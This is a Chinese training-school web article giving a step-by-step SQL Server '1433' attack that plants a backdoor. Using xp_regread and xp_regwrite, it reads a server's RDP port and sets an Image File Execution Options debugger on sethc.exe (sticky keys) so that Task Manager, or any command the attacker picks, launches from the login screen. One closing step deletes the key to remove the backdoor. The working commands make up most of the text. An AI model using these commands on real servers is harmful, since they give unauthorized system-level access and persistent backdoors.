微信客服
微信公众号
北大青鸟数据库技术:1433映像劫持后门提权。
1.服务器开启了终端端口(终端端口未必是3389,可以自行查询)
2.服务器的粘滞键功能无损,只要可以正常弹出即可
3.服务器未禁止注册表编辑(即写入功能)
sql命令读取服务器终端端口:
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-
Tcp','PortNumber'
1.sql命令查询注册表粘滞键是否被劫持
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','Debugger'
2.sql命令劫持注册表粘滞键功能,替换成任务管理器(当然你也可以替换成你想要的其他命令)
xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe',
'Debugger','REG_SZ','C:\WINDOWS\system32\taskmgr.exe'
3.sql命令删除注册表粘滞键的劫持功能保护你的服务器不再被他人利用
xp_regdeletekey 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe'
了解更多北大青鸟数据库技术请继续关注云顶国际官网。
- MySQL数据库查询超时问题解决
- 什么是SQL数据库?SQL数据库是什么?
- 参数化查询解决SQL注入漏洞问题
- 北大青鸟学大数据好吗?就业前景在哪?
- 北大青鸟数据库技术 1433映像劫持后门提权
- Linux配置源码安装的MySQL同时支持多个字符集
- MYSQL服务常见错误总结
- 数据库原理及应用教程之数据库架构抉择
- mysql数据库存储IP地址省空间的方法
- 数据库技术之简要分析SQL Server表的占用容量大小
看过该数据库技术教程的还看过
本文标题:北大青鸟数据库技术 1433映像劫持后门提权,责任编辑:027hpedu,来源:北大青鸟武汉宏鹏鲁广校,于2013年04月23日15时14分发布于云顶国际登录官网。云顶国际宏鹏鲁广校区,是北大青鸟武汉电脑学校,专业IT计算机培训,拥有软件/网络/安卓/Web前端/Java课程.北大青鸟地址:光谷广场鲁巷数码港.电话:027-87807717
